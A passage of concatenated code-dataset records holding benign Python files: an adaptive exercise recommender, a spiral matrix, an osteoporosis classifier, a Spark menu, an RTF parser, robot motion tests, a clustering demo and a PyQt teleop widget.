ajouter_prerequis:\n for k in competences:\n competences = competences + [kp for kp in k.prerequis]\n # Enlever les doublons\n competences = list(set(competences))\n etudiant = self.etudiants[idEtudiant]\n resultats = [self.exercices[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n reponses = [etudiant.resultats[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n matriceQ = [[1 if k in exo.competences else 0 for k in self.competences.values()] for exo in resultats]\n niveauxPred = etudiant.niveauxCompetences\n choixExercices = []\n matQchoisies = []\n for n in range(nbExercices):\n maxProgres = float('-inf')\n choixCourant = None\n niveauxCourant = niveauxPred\n # On parcours tous les exercices possibles\n for exo in self.exercices.values():\n # Si l'exercice concerne les compétences concernées et n'est pas déjà choisi\n if (not exo in choixExercices) and ([k for k in exo.competences if k in competences] != []):\n matQCourante = [1 if k in exo.competences else 0 for k in self.competences]\n bnds = [[-1, 1]]*len(self.competences)\n f = lambda x : -esperanceVraisemblance(resultats, choixExercices+[exo], x, matriceQ, matQchoisies+[matQCourante], reponses)\n opt = optimize.minimize(f, [-1]*len(self.competences), bounds=bnds)\n progres = sum([opt.x[c.nId]-niveauxPred[c.nId] for c in competences])\n if progres >= maxProgres:\n niveauxCourant = opt.x\n maxProgres = progres\n choixCourant = exo\n if choixCourant != None:\n choixExercices.append(choixCourant)\n matQchoisies.append(matQCourante)\n # Une fois l'exo choisi on mets à jour le vecteur de compétences prédit\n niveauxPred = niveauxCourant\n return choixExercices\n \n \n \n def choisirExercice(self, idEtudiant, idCompetences):\n maxProgres = float('-inf')\n choixExercice = None\n competences = [self.competences[i] for i in idCompetences]\n etudiant = self.etudiants[idEtudiant]\n # On parcours tous les exercices possibles\n resultats = [self.exercices[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n reponses = [etudiant.resultats[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n matriceQ = [[1 if k in exo.competences else 0 for k in self.competences.values()] for exo in resultats]\n for exo in self.exercices.values():\n # Si l'exercice concerne les compétences concernées\n if [k for k in exo.competences if k in competences] != []:\n matQChoisie = [1 if k in exo.competences else 0 for k in self.competences]\n bnds = [[-1, 1]]*len(self.competences)\n f = lambda x : -esperanceVraisemblance(resultats, [exo], x, matriceQ, [matQChoisie], reponses)\n opt = optimize.minimize(f, [-1]*len(self.competences), bounds=bnds)\n progres = sum([opt.x[c.nId]-etudiant.niveauxCompetences[c.nId] for c in competences])\n if progres >= maxProgres:\n maxProgres = progres\n choixExercice = exo\n return choixExercice\n\n \n\n #--------------------------------------------------------------------------\n \n \n \n def ajouterTheme(self, idTheme, nom):\n self.themes[idTheme] = theme.Theme(idTheme, nom)\n \n def ajouterCompetence(self, idCompetence, nom, idTheme, idPrerequis):\n self.competences[idCompetence] = competence.Competence(idCompetence, nom, self.themes[idTheme], prerequis=[self.competences[i] for i in idPrerequis])\n\n def ajouterExercice(self, idExercice, enonce, reponse, idThemes, idCompetences, discriminations, facilite):\n for k in self.competences:\n if not k in discriminations:\n if k in idCompetences:\n discriminations[k] = 1\n else:\n discriminations[k] = 0 \n self.exercices[idExercice] = exercice.Exercice(idExercice, enonce, reponse, themes=[self.themes[i] for i in idThemes], competences=[self.competences[i] for i in idCompetences], discriminations=discriminations, facilite=facilite)\n\n def ajouterEtudiant(self, idEtudiant, prenom, nom, niveauxCompetences, resultats):\n for k in self.exercices:\n if not k in resultats:\n resultats[k] = -1 \n self.etudiants[idEtudiant] = etudiant.Etudiant(idEtudiant, prenom, nom, niveauxCompetences, resultats)\n\n\n\n \n#==============================================================================\n\nif __name__ == \"__main__\":\n\n\n main = Main()\n \n # Il faut respecter l'ordre d'import themes -> competences -> exercices, etudiants\n \n main.ajouterTheme(0, \"Arithmétique\")\n main.ajouterCompetence(0, \"Addition\", 0, [])\n main.ajouterCompetence(1, \"Soustraction\", 0, [0])\n main.ajouterCompetence(2, \"Multiplication\", 0, [0])\n\n\n # idExercice, enonce, reponse, idThemes, idCompetences, discriminations, facilite\n main.ajouterExercice(0, \"texte\", \"\", [0], [0], {}, 1)\n main.ajouterExercice(1, \"texte\", \"\", [0], [1], {}, 1)\n main.ajouterExercice(6, \"texte\", \"\", [0], [0,2], {}, 1)\n main.ajouterExercice(5, \"texte\", \"\", [0], [0], {}, 1)\n\n\n main.ajouterEtudiant(0, \"Bob\", \"Smith\", {}, {0:1, 1:1, 6:0, 5:-1})\n \n bob = main.etudiants[0]\n main.actualiserNiveaux(0)\n\n bob.resultats[5]=1\n\n main.actualiserNiveaux(0)\n \n# print(main.choisirExercice(0, [1, 2]).nId)\n# print([exo.nId for exo in main.genererFE(0, [1, 2], 3)])\n \n\n","sub_path":"mainAlgo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163745374","text":"s = int(input())\n\nmatrix = [[0 for j in range(0, s)] for i in range(0, s)]\n\ndef go(chetnost):\n num = 1\n str = 0\n row = s-1\n n=1\n\n while num < s**2-chetnost:\n for k in range(0, 2):\n for j in range(str, row, n):\n matrix[str][j] = num\n num +=1\n\n for i in range(str, row, n):\n matrix[i][row] = num\n num +=1\n\n str,row = row,str\n n = n*(-1)\n k+=1\n\n str +=1\n row -=1\nif s%2 == 0:\n go(1)\n\nelse:\n go(0)\n matrix[int(s/2)][(int(s/2))] = s**2\n\nfor i in range(0, s):\n for j in range(0, s):\n print(matrix[i][j], end=\" \")\n print()","sub_path":"Task5.6.py","file_name":"Task5.6.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"308567093","text":"import pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\n\nimport seaborn as sns\nfrom sklearn.feature_selection import mutual_info_classif, SelectKBest, chi2\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import classification_report, precision_recall_curve,\\\n confusion_matrix, accuracy_score,roc_auc_score,roc_curve, f1_score, precision_score, auc\n\nfrom collections import Counter\nfrom imblearn.under_sampling import RandomUnderSampler\n\nfrom feature_classifier_utils import ensemble_voting, GridSVM\nfrom feature_performance_utils import load_texture_feature, load_clinical_data, save_confusion_matrix, Validation, normal_porosis, save_roc_curve\n\nnp.random.seed(1010)\n\n### feature_2018 = '../final_2018_result/2018_texture_features.xlsx'\nfeature_2012 = '../final_2012_result/texture_feautures.xlsx'\nfeature_2018 = '../final_2018_result/2018_texture_features.xlsx'\nfeature_2013 = '../final_2013_result/texture_features_zscore.xlsx'\n\n# label_2018 = '../data/2018_label_dict.pickle'\n# label_2012 = '../data/2012_label_dict.pickle'\n\nlabel_2018_class3 = '../data/2018_label_dict_class3.pickle'\nlabel_2012_class3 = '../data/2012_label_dict_class3.pickle'\n\nlabel_2018_class1 = '../data/2018_label_dict_class1.pickle'\nlabel_2012_class1 = '../data/2012_label_dict_class1.pickle'\nlabel_2013_class1 = '../data/2013_label_dict_class1.pickle'\n\nclinic_2018 = '../data/2018_clinical_data.pickle'\nclinic_2012 = '../data/2012_clinical_data.pickle'\nclinic_2013 = '../data/2013_clinical_data.pickle'\n\n# feature_data_2018, feature_name_2018, feature_index_2018, binary_feature_label_2018 = \\\n# load_texture_feature(feature_2018, label_2018)\n\n# feature_data_2012, feature_name_2012, feature_index_2012, binary_feature_label_2012 = \\\n# load_texture_feature(feature_2012, label_2012)\n\nfeature_data_2018, feature_name_2018, feature_index_2018, feature_label_2018_class1 = \\\n load_texture_feature(feature_2018, label_2018_class1)\n\nfeature_data_2012, feature_name_2012, feature_index_2012, feature_label_2012_class1 = \\\n load_texture_feature(feature_2012, label_2012_class1)\n\nfeature_data_2013, feature_name_2013, feature_index_2013, feature_label_2013_class1 = \\\n load_texture_feature(feature_2013, label_2013_class1)\n\n\nclinical_data_2018, clinical_feature_names = load_clinical_data(clinic_2018, feature_index_2018)\nclinical_data_2012, _ = load_clinical_data(clinic_2012, feature_index_2012)\nclinical_data_2013, _ = load_clinical_data(clinic_2013, feature_index_2013)\n\nprint(feature_data_2018.shape, len(feature_label_2018_class1), len(clinical_data_2018))\nprint(feature_data_2012.shape, len(feature_label_2012_class1), len(clinical_data_2012))\nprint(feature_data_2013.shape, len(feature_label_2013_class1), len(clinical_data_2013))\n\nnum_try = 1\ntry_dict = dict()\n\nhighest_acc = 0.0\n\ninternal_feature_data = np.concatenate((feature_data_2013, feature_data_2018))\ninternal_feature_label = np.concatenate((feature_label_2013_class1, feature_label_2018_class1))\ninternal_clinical_data = np.concatenate((clinical_data_2013,clinical_data_2018))\n\nexternal_feature_data = feature_data_2012\nexternal_feature_label = feature_label_2012_class1\nexternal_clinical_data = clinical_data_2012\n\nrus = RandomUnderSampler(random_state=42)\n\nclass_3_index = ['normal label', 'penia label', 'porosis label']\nclass_3_cols = ['normal prediction', 'penia prediction', 'porosis prediction']\n\nclass_2_index = ['normal label', 'porosis & penia label']\nclass_2_cols = ['normal prediction', 'porosis & penia prediction']\n\nclass_1_index = ['normal&penia label', 'porosis label']\nclass_1_cols = ['normal&penia prediction', 'porosis prediction']\n\nif len(Counter(internal_feature_label).keys()) == 2:\n average_method = 'binary'\n conf_index = class_1_index\n conf_cols = class_1_cols\nelse:\n average_method = None\n conf_index = class_3_index\n conf_cols = class_3_cols\n \nprint('Average Method : ', average_method)\n\nfor i in range(num_try):\n \n k_dict = {}\n \n print(\"++++++++++\")\n print(i+1 , \"st try\")\n print(\"++++++++++\\n\")\n\n for k in range(1,20):\n\n selector = SelectKBest(mutual_info_classif, k = k)\n\n # k 만큼 새로운 x 데이터를 만든다\n new_x = selector.fit_transform(internal_feature_data, internal_feature_label)\n \n # late fusion (after feature selection) clinical data\n new_x = np.hstack((np.array(new_x), internal_clinical_data))\n\n # feature selection\n selector_info = selector.fit(internal_feature_data, internal_feature_label)\n selected_feature = selector_info.get_support()\n \n new_x, new_y = rus.fit_resample(new_x, internal_feature_label)\n# new_y = internal_feature_label\n \n print(\"Train Dataset\")\n print(Counter(new_y))\n\n # train test set divide\n X_train, X_test, y_train, y_test = train_test_split(new_x,\n new_y,\n test_size=0.20,\n random_state=42)\n\n # random forest classifier\n\n clf = ensemble_voting(X_train, y_train, random_state=42, cv=5)\n \n # train\n clf.fit(X_train, y_train)\n\n # evaluation\n \n print('================================')\n print(\"Internal Evaluation for k = \", k)\n \n internal_result = Validation(clf, X_test, y_test)\n \n # confusion = internal_result[-1]\n # save_confusion_matrix(confusion, conf_index, conf_cols, \"Internal Validation Confusion matrix\")\n\n k_dict[k] = [internal_result, selected_feature]\n \n print('================================')\n print(\"External Validation for k = \", k)\n \n new_external_x = [a[selected_feature==True] for a in np.array(external_feature_data)]\n new_external_x = np.hstack((np.array(new_external_x), external_clinical_data))\n \n new_external_x, new_y = rus.fit_resample(new_external_x, external_feature_label)\n \n print(Counter(new_y))\n \n ext_val_result = Validation(clf, new_external_x, new_y)\n \n confusion = ext_val_result[-1]; save_confusion_matrix(confusion, conf_index, conf_cols, \"External Validation Confusion matrix\")\n\n print('================================')\n \n try_dict[i] = k_dict\n\nprint('done')\n\n","sub_path":"new_osteo_feature_analysis.py","file_name":"new_osteo_feature_analysis.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"170938935","text":"import os\r\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-sql-kafka-0-10_2.11:2.4.4 pyspark-shell'\r\nimport Part1_SparkSQL as a\r\nimport Part2_SparkStreaming as b\r\n#import Part3_Analysis_and_Visualization as c\r\n \r\ndef main():\r\n print('Hello. Welcome to the system!')\r\n entry = None\r\n while entry != 'd':\r\n entry = input('\\na) Read/Write credit card data from MariaDB to MongoDB\\\r\n \\nb) Read/Write data from \"Health Insurance Marketplace\" to MongoDB\\\r\n \\nc) Analyze/Visualize data (after loading)\\\r\n \\nd) Log out\\\r\n \\n\\nPlease choose a, b, c, or d:\\\r\n \\n>>>>> ')\r\n if entry == 'a':\r\n mdb_entry = input('\\nMariaDB Tables:\\\r\n \\n\\ta) Table One: CDW_SAPP_BRANCH\\\r\n \\n\\tb) Table Two: CDW_SAPP_CREDITCARD\\\r\n \\n\\tc) Table Three: CDW_SAPP_CUSTOMER\\\r\n \\n\\nPlease select a table from the list\\\r\n \\n>>>>> ')\r\n if mdb_entry == 'a':\r\n a.main('cdw_sapp_branch', a.branch_transformation_query, 'CDW_SAPP_D_BRANCH')\r\n elif mdb_entry == 'b':\r\n a.main('cdw_sapp_creditcard', a.cc_transformation_query, 'CDW_SAPP_D_CREDIT_CARD')\r\n elif mdb_entry == 'c':\r\n a.main('cdw_sapp_customer', a.customer_transformation_query, 'CDW_SAPP_D_CUSTOMER') \r\n elif entry == 'b':\r\n himd_entry = input('\\nHealth Insurance Marketplace Data Files:\\\r\n \\n\\ta) BenefitsCostSharing.txt\\\r\n \\n\\tb) Insurance.csv\\\r\n \\n\\tc) PlanAttributes.csv\\\r\n \\n\\td) Network.csv\\\r\n \\n\\te) ServiceArea.csv\\\r\n \\n\\nPlease select a file from the list\\\r\n \\n>>>>> ')\r\n if himd_entry == 'a':\r\n b.main(b.url_1, b.topic_1, '\\t', 'benefits_cost_sharing')\r\n b.main(b.url_2, b.topic_2, '\\t', 'benefits_cost_sharing')\r\n b.main(b.url_3, b.topic_3, '\\t', 'benefits_cost_sharing')\r\n b.main(b.url_4, b.topic_4, '\\t', 'benefits_cost_sharing')\r\n elif himd_entry == 'b':\r\n b.main(b.url_5, b.topic_5, '\\t', 'insurance')\r\n elif himd_entry == 'c':\r\n b.main(b.url_6, b.topic_6, '\\t', 'plan_attributes')\r\n elif himd_entry == 'd':\r\n b.main(b.url_7, b.topic_7, ',', 'network')\r\n elif himd_entry == 'e':\r\n b.main(b.url_8, b.topic_8, ',', 'service_area')\r\n else:\r\n print('Invalid Option...')\r\n elif entry == 'c':\r\n viz_entry = input('\\nAnalysis and Visualization Options:\\\r\n \\n\\ta) Plot state counts of ServiceAreaName, SourceName, and BusinessYear\\\r\n \\n\\tb) Plot the counts of sources across the country\\\r\n \\n\\tc) Do not choose\\\r\n \\n\\td) Plot the number of benefit plans in each state\\\r\n \\n\\te) Print the number of mothers who smoke\\\r\n \\n\\tf) Plot the rate of smoking for each region\\\r\n \\n\\nPlease select an option from the list\\\r\n \\n>>>>> ')\r\n if viz_entry == 'a':\r\n c.a()\r\n elif viz_entry == 'b':\r\n c.b()\r\n elif viz_entry == 'd':\r\n c.d()\r\n elif viz_entry == 'e':\r\n c.e()\r\n elif viz_entry == 'f':\r\n c.f()\r\n else:\r\n print('Invalid Option...') \r\n elif entry != 'd':\r\n print('\\nInvalid Option...')\r\n print('Closing Program. Goodbye.')\r\n \r\nif __name__=='__main__':\r\n main()","sub_path":"MainEntryPoint.py","file_name":"MainEntryPoint.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"473941422","text":"\"\"\"\n### Copied from pyrtf-ng package ### \n\n\"\"\"\n\nfrom rtf_grammar import grammar\n\nLEFT_BRACKET = '{'\nRIGHT_BRACKET = '}'\nBACKSLASH = '\\\\'\nLETTERS = range(ord('a'), ord('z') + 1) + range(ord('A'), ord('Z') + 1)\nDIGITS = range(ord('0'), ord('9') + 1 )\nSPACE = ' '\nHYPHEN = '-'\n\nclass RtfParser(object):\n\n def __init__(self, rtfData=None):\n self.rtfContent = None\n if rtfData:\n self.parse(rtfData)\n \n def parse(self, rtfData):\n \"\"\"\n # setup the tests to read the test RTF files\n >>> import os.path\n >>> package, module = os.path.split(__file__)\n >>> trunk, package = os.path.split(package)\n >>> basedir = os.path.join(trunk, 'test', 'sources', 'macrtf')\n >>> def getFileData(filename):\n ... fh = open(os.path.join(basedir, filename))\n ... data = fh.read()\n ... fh.close()\n ... return data\n\n # simple, single-word content\n #>>> data = getFileData('simpleContent.rtf')\n #>>> try:\n #... rp = RTFParser(data)\n #... import pdb;pdb.set_trace()\n #... except Exception, e:\n #... print e\n #... print data.splitlines()\n #>>> rp.tokens\n #>>> dir(rp.tokens)\n #>>> rp.tokens.asDict()\n #>>> rp.tokens.items()\n \"\"\"\n self.tokens = grammar.parseString(rtfData)\n self._loadContent()\n \n def getCodePage(self):\n return self.tokens['codePage']\n\n codePage = property(getCodePage) \n\n def _processControlName(self, cntName):\n \n if (cntName == 'cell'):\n return '\\t'\n elif (cntName == 'par'):\n return '\\n'\n \n return ''\n \n def _loadContent(self):\n \"\"\" very simple RTF parser \"\"\"\n if (not self.tokens): return None\n if (not self.tokens['rtfContent']): return None\n \n if (self.rtfContent):\n return\n \n stack = ['{']\n content = ''\n controlName = ''\n \n for ch in self.tokens['rtfContent']:\n if len (stack) == 0: break\n stackHead = stack[-1]\n \n if (ch == LEFT_BRACKET or ch == RIGHT_BRACKET):\n if (stackHead == BACKSLASH):\n if len (controlName) > 0:\n content += self._processControlName (controlName)\n controlName = ''\n \n stack.pop()\n stack.append (ch)\n else: \n content += ch\n stack.pop ()\n elif (ch == RIGHT_BRACKET): \n stack.pop () # eat group\n else:\n stack.append (ch)\n \n elif (ch == BACKSLASH):\n if (stackHead == BACKSLASH):\n if len (controlName) > 0:\n content += self._processControlName (controlName)\n controlName = ''\n else:\n content += BACKSLASH\n stack.pop ()\n else: \n stack.append (ch)\n else:\n if (stackHead == BACKSLASH):\n if (ord(ch) in LETTERS) or (ch == SPACE) or (ch == HYPHEN) or (ord(ch) in DIGITS):\n controlName += ch\n if (ch == SPACE):\n content += self._processControlName (controlName)\n controlName = ''\n stack.pop ()\n else:\n if len (controlName) > 0:\n content += self._processControlName (controlName)\n controlName = ''\n else:\n content += ch #XXX: control symbol \n \n stack.pop () # delimiter\n \n else: \n content += ch\n \n self.rtfContent = content\n\n\ndef _test():\n pass\n\nif __name__ == '__main__':\n _test()\n\n","sub_path":"import/rtf_parser.py","file_name":"rtf_parser.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124964635","text":"import math\nfrom unittest.mock import call\n\nimport pytest\n\nfrom ex02.robot import Robot, MotionController, Wheel, EnergySupplier\nfrom ex02.motion import Translation, Rotation\nfrom ex02.geometry import Point\n\n\ndef get_values_from_call_list(call_list):\n return list(a[0][0] for a in call_list)\n\n\nclass TestMotionController:\n\n @pytest.fixture()\n def init_controller(self, mocker):\n robot = mocker.Mock(spec=Robot)\n right_wheel = mocker.Mock(spec=Wheel)\n left_wheel = mocker.Mock(spec=Wheel)\n energy_supplier = mocker.Mock(spec=EnergySupplier)\n configuration = {}\n ctrl = MotionController(right_wheel=right_wheel,\n left_wheel=left_wheel,\n configuration=configuration)\n\n return ctrl, robot, right_wheel, left_wheel, configuration, energy_supplier\n\n def test_default_values_are_well_known(self, init_controller):\n \"\"\"Assertions about implicit values\"\"\"\n ctrl, *_ = init_controller\n\n assert MotionController.DEFAULT_WHEEL_AXIS_LENGTH == 1\n assert MotionController.CONSUMPTION_PER_LENGTH_UNIT == 1\n assert MotionController.DEFAULT_SPEED == 0.1\n assert MotionController.CONSUMPTION_PER_LENGTH_UNIT == 1\n assert MotionController.DEFAULT_TIME_STEP == 0.1\n\n assert ctrl.speed == MotionController.DEFAULT_SPEED\n assert ctrl.consumption_per_length_unit == MotionController.CONSUMPTION_PER_LENGTH_UNIT\n assert ctrl.time_step == MotionController.DEFAULT_TIME_STEP\n\n def test_translation(self, init_controller):\n # --given--\n ctrl, robot, right_wheel, left_wheel, _, energy_supplier = init_controller\n tr = Translation(Point(0, 0), Point(10, 0))\n assert tr.length == 10\n\n expected_nb_call = 1000\n len_step_per_call = 0.01\n\n assert expected_nb_call * len_step_per_call == tr.length\n\n # --when--\n ctrl.run_translation(tr, energy_supplier)\n\n # --then--\n assert right_wheel.run.call_count == expected_nb_call\n assert left_wheel.run.call_count == expected_nb_call\n\n right_wheel.run.assert_called_with(len_step_per_call)\n left_wheel.run.assert_called_with(len_step_per_call)\n\n def test_rotation_on_the_spot(self, init_controller):\n # --given--\n ctrl, robot, right_wheel, left_wheel, _, energy_supplier = init_controller\n center = Point(1, 0)\n rot = Rotation(start=center,\n end=center,\n start_vector=Point(0, 1),\n end_vector=Point(-1, 0))\n angle = math.pi / 2\n radius = 0\n expected_nb_of_wheel_run_call = 78\n \n self._do_assertions_about_params(rot, center, angle, radius)\n\n\n # --when--\n ctrl.run_rotation(rot, energy_supplier)\n\n # --then--\n right_args = self.extract_values(right_wheel, 'run')\n left_args = self.extract_values(left_wheel, 'run')\n supplier_args = self.extract_values(energy_supplier, 'consume')\n\n self._do_assertions_nb_of_call(right_args,\n left_args,\n supplier_args,\n expected_nb_of_wheel_run_call)\n\n self._do_assertions_nb_of_distinct_values(right_args,\n left_args,\n supplier_args,\n 1)\n\n\n # inversed value\n assert right_args[0] == -left_args[0]\n assert right_args[0] == (rot.arc.angle/2) / expected_nb_of_wheel_run_call\n\n @pytest.mark.parametrize(\"params\", [\n {'rotation': Rotation(start=Point(10, 0),\n end=Point(0, 10),\n start_vector=Point(0, 1),\n end_vector=Point(-1, 0)),\n 'center': Point(0, 0),\n 'angle': math.pi / 2,\n 'radius': 10,\n 'expected_nb_of_wheel_run_call': 1649\n },\n {'rotation': Rotation(start=Point(0, 5),\n end=Point(0, 0),\n start_vector=Point(1, -1),\n end_vector=Point(-1, -1)),\n 'center': Point(-2.5, 2.5),\n 'angle': -3*math.pi / 2,\n 'radius': 3.5355339059327373,\n 'expected_nb_of_wheel_run_call': 1901\n }\n\n ])\n def test_rotation_with_center(self, params, init_controller):\n # --given--\n ctrl, robot, right_wheel, left_wheel, _, energy_supplier = init_controller\n\n center = params['center']\n rot = params['rotation']\n angle = params['angle']\n radius = params['radius']\n expected_nb_of_wheel_run_call = params['expected_nb_of_wheel_run_call']\n\n self._do_assertions_about_params(rot, center, angle, radius)\n\n # --when--\n ctrl.run_rotation(rot, energy_supplier)\n\n # --then--\n right_args = self.extract_values(right_wheel, 'run')\n left_args = self.extract_values(left_wheel, 'run')\n supplier_args = self.extract_values(energy_supplier, 'consume')\n\n # same nb of calls\n self._do_assertions_nb_of_call(right_args,\n left_args,\n supplier_args,\n expected_nb_of_wheel_run_call)\n\n self._do_assertions_nb_of_distinct_values(right_args,\n left_args,\n supplier_args,\n 1)\n\n self._do_assertions_lenght_values_for_both_wheels(rot,\n right_args,\n left_args,\n expected_nb_of_wheel_run_call,\n angle)\n\n def _do_assertions_about_params(self, rot, center, angle, radius):\n assert math.isclose(rot.arc.angle, angle)\n assert rot.arc.center == center\n assert rot.arc.radius == radius\n\n def _do_assertions_nb_of_call(self, right_args, left_args, supplier_args,\n expected_nb_of_wheel_run_call):\n assert len(right_args) == len(left_args)\n # energy supplier call two time more\n assert len(supplier_args) == len(right_args)\n assert len(right_args) == expected_nb_of_wheel_run_call\n\n def _do_assertions_nb_of_distinct_values(self, right_args, left_args, supplier_args, nb_arg):\n # same nb of diff. value\n assert len(set(right_args)) == len(set(left_args)) == nb_arg\n assert len(set(supplier_args)) == nb_arg\n\n def _do_assertions_lenght_values_for_both_wheels(self, rotation,\n right_args,\n left_args,\n expected_nb_of_wheel_run_call,\n angle):\n \"\"\"Does assertions about length values for both wheels\"\"\"\n half_axis_len = MotionController.DEFAULT_WHEEL_AXIS_LENGTH / 2\n\n big_radius = (rotation.arc.radius + half_axis_len)\n short_radius = (rotation.arc.radius - half_axis_len)\n\n ratio = big_radius / short_radius\n\n right_value = right_args[0]\n left_value = left_args[0]\n\n max_value = max(right_value, left_value)\n min_value = min(right_value, left_value)\n\n ratio_from_step = max_value / min_value\n assert ratio == pytest.approx(ratio_from_step), \"ratio assertion\"\n\n expected_max_value = math.fabs(angle / expected_nb_of_wheel_run_call * (rotation.arc.radius + half_axis_len))\n\n assert max_value == pytest.approx(expected_max_value), \"max value for rotation\"\n\n\n def extract_values(self, mock, param):\n \"\"\"Extracts values from mock's call_args_list\"\"\"\n args = getattr(mock, param).call_args_list\n return get_values_from_call_list(args)\n","sub_path":"test/test_motion_controller_exercise_2_3.py","file_name":"test_motion_controller_exercise_2_3.py","file_ext":"py","file_size_in_byte":8158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"139934305","text":"import pygame\nfrom pygame.locals import *\nimport sys\nimport numpy as np\nfrom drawings import *\nimport time\nfrom functions import *\n\n\nclass Hierarchic():\n def __init__(self, points, groups):\n self.points = generatePoints(points, groups)\n self.color_of_point = np.zeros(self.points.shape[0])\n self.dist = np.zeros((self.points.shape[0], self.points.shape[0]))\n self.numbers = str(range(0, self.points.shape[0], 1))\n\n def calculateDistance(self):\n for x in range(self.points.shape[0]):\n for y in range(self.points.shape[0]):\n if x == y:\n self.dist[x][y] = np.nan\n else:\n self.dist[x][y] = dist(self.points[x], self.points[y])\n\n def hier(self, distance, surface):\n self.calculateDistance()\n while True:\n if self.dist.shape[0] <= 1:\n break\n result = np.where(self.dist == np.nanmin(self.dist))\n if self.dist[result[0][0]][result[0][1]] >= distance:\n return\n try:\n self.numbers[result[0][0]] += self.numbers[result[0][1]]\n self.numbers.pop(result[0][1])\n except:\n print(type(result[0][0]), type(self.numbers))\n for x in range(self.points.shape[0]):\n if self.dist[result[0][0]][x] == np.nan or self.dist[result[0][1]][x] == np.nan:\n self.dist[result[0][0]][x] = np.nan\n elif self.dist[result[0][0]][x] > self.dist[result[0][1]][x]:\n self.dist[result[0][0]][x] = self.dist[result[0][1]][x]\n self.dist = np.delete(self.dist, result[0][1])\n\n\ndef hierarhichWindow(surface):\n value1, value2, value3 = 0, 0, 0\n flag1, flag2, flag3 = False, False, False\n rect1, rect2, rect3 = (100, 50, 200, 10), (100, 150, 200, 10), (100, 250, 200, 10)\n font = pygame.font.SysFont(\"comicsansms\", 18)\n drawSurface(surface)\n drawScaling(surface, value1, 100, rect1, font, \"Points:\")\n drawScaling(surface, value2, 10, rect2, font, \"Groups:\")\n drawScaling(surface, value3, 9, rect3, font, \"Distance:\")\n drawButton(surface, (100, 300, 200, 50), getColor(9), font, \"Simulate\")\n pygame.display.update()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.MOUSEMOTION:\n if event.buttons[0] == 1:\n pos = pygame.mouse.get_pos()\n if inBoundriesOfRect(rect1, pos) or inBoundriesOfCircle(\n (rect1[0] + 2 * value1, rect1[1] + (rect1[3] / 2)), 20, pos) or flag1:\n if pos[0] >= 300:\n value1 = 100\n elif pos[0] <= 100:\n value1 = 0\n else:\n value1 = int((pos[0] - 100) / 2)\n flag1 = True\n elif inBoundriesOfRect(rect2, pos) or inBoundriesOfCircle(\n (rect2[0] + 20 * value2, rect2[1] + (rect2[3] / 2)), 20, pos) or flag2:\n if pos[0] >= 300:\n value2 = 10\n elif pos[0] <= 100:\n value2 = 0\n else:\n value2 = int((pos[0] - 100) / 20)\n flag2 = True\n elif inBoundriesOfRect(rect3, pos) or inBoundriesOfCircle(\n (rect3[0] + 4 * value3, rect3[1] + (rect3[3] / 2)), 20, pos) or flag3:\n if pos[0] >= 300:\n value3 = 50\n elif pos[0] <= 100:\n value3 = 0\n else:\n value3 = int((pos[0] - 100) / 4)\n flag3 = True\n drawSurface(surface)\n drawScaling(surface, value1, 100, (100, 50, 200, 10), font, \"Points:\")\n drawScaling(surface, value2, 10, (100, 150, 200, 10), font, \"Groups:\")\n drawScaling(surface, value3, 50, (100, 250, 200, 10), font, \"Distance:\")\n drawButton(surface, (100, 300, 200, 50), getColor(9), font, \"Simulate\")\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n flag1, flag2, flag3 = False, False, False\n pos = pygame.mouse.get_pos()\n if pos[0] >= 100 and pos[0] <= 300 and pos[1] >= 300 and pos[1] <= 350:\n if value1 != 0 and value2 != 0 and value3 != 0:\n h = Hierarchic(value1, value2)\n h.hier(value3, surface)\n","sub_path":"Hierarchic.py","file_name":"Hierarchic.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"627195851","text":"#!/usr/bin/env python\n\nfrom PyQt5.QtGui import QImage, QPainter, QPen\nfrom PyQt5.QtCore import pyqtSignal, QPointF, Qt, QPoint\nfrom PyQt5.QtWidgets import QWidget, QGridLayout\n\nimport os\nimport rospy\nimport rospkg\n\nclass TeleopWidget(QWidget):\n stop_sig = pyqtSignal()\n\n def __init__(self, win_parent, parent_function_name, side):\n super(TeleopWidget, self).__init__()\n self.parent_function = getattr(win_parent, parent_function_name)\n self.line = QPointF(0, 0)\n self.qimage = QImage()\n self.qimage.load(os.path.join(rospkg.RosPack().get_path('rqt_drone_teleop'), 'resource', 'ball.png'))\n self.stop_sig.connect(self.stop)\n self.init_ui(side)\n\n def init_ui(self, side):\n layout = QGridLayout()\n self.setLayout(layout)\n self.setAutoFillBackground(True)\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.black)\n self.setPalette(p)\n self.resize(side, side)\n self.setMinimumSize(side, side)\n\n def stop(self):\n self.line = QPointF(0, 0)\n self.repaint()\n\n def mouseMoveEvent(self, e):\n if e.buttons() == Qt.LeftButton:\n x = e.x()-self.width()/2\n y = e.y()-self.height()/2\n self.line = QPointF(x, y)\n self.repaint()\n\n def paintEvent(self, e):\n _width = self.width()\n _height = self.height()\n width = 2\n painter = QPainter(self)\n pen = QPen(Qt.blue, width)\n painter.setPen(pen)\n #Centro del widget\n 